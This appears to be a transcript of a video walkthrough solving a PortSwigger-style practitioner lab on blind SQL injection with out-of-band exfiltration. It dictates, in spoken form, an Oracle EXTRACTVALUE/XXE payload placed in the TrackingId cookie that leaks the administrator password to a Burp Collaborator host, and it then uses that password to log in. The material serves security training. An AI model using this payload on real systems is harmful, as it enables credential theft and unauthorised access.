Hi guys, we will solve the lab blind SQL injection with out-of-band data exfiltration. The level of this lab is practitioner and the goal is to log in as the administrator user. Let us access the lab. First, make sure that you're proxying your traffic through Burp and switch to your Burp proxy and activate the intercept is on button. Back in your browser, refresh the site and send the request, the GET request to the application to Burp repeater. Deactivate the intercept is on button and switch to Burp repeater. Here go to the cookie header and add the following query to the tracking ID parameter. Before you start, you should open the Burp collaborator client. For this, open the Burp menu and shows the option Burp collaborator client. Here, click the button copy to clipboard and leave the Burp collaborator client window open. Switch back to your Burp repeater and add the following query to the tracking ID parameter in the cookie header. Okay, plus Anjan plus select plus extract value XML type %3F XML plus version %3D 1.0 plus encoding %3D UTF-8 %3F exclamation mark doc type plus root plus entity plus %25 plus remote plus system plus HTTP %3A // select plus password plus from plus users plus where plus username %3D administrator dot. Now paste the address of the Burp collaborator client. Slash plus %25 remote %3B. Comma slash 1 plus from plus dual minus minus. Now send the request to the application. You see we received an HTTP 200 OK. Switch to your Burp collaborator client window and push the button poll now. And you see we received some messages. Here go to the HTTP message and switch to the request. And here the password is a subdomain of our Burp Collaborator client. Copy this one, switch to your browser, click the My Account link and type in administrator and paste the password from the Collaborator client window. Now click the login button and you see we solved the lab.